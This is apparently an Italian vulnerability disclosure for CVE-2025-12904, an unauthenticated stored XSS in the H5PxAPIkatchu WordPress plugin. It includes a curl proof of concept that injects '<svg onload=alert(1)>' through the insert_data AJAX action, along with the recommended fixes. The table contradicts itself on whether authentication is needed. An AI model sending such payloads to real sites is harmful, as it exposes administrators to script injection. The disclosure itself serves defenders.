
Divulgazione per CVE-2025-12904
Divulgazione per CVE-2025-12904
Questo repository divulga una vulnerabilità scoperta in SNORDIAN's H5PxAPIkatchu <= 0.4.16,WordPress plugin sviluppato da otacke.
| CVE ID | Tipo | Componente | Impatto |
|---|
| CVE-2025-12904 | Cross-Site Scripting Memorizzato Non Autenticato tramite insert_data | class-table-view.php | L'attaccante autenticato può eseguire JS |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※Se l'id all'interno dell'oggetto non esiste, fallirà.
La funzione insert_data() non effettuava alcun controllo dei permessi, permettendo di salvare input dannosi senza autenticazione. Inoltre, queste voci venivano visualizzate senza escape nell'interfaccia di amministrazione.
insert_data() usa current_user_can per prevenire l'esecuzione non autorizzata.esc_html($value) invece di echo $value, è possibile prevenire l'esecuzione di XSS.È stato molto difficile creare il PoC.
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
Ho passato molto tempo a riprodurre questa parte. Vorrei diventare più abile con il comando curl. E poi questo plugin... va tutto bene? Soprattutto, il nome, ecc.
Nome: MooseLove
Ruolo: Ricercatore di sicurezza indipendente / cacciatore di bug
Contatto: Disponibile su richiesta
Questa segnalazione è fornita per la consapevolezza pubblica sulla sicurezza. Libera da condividere con attribuzione.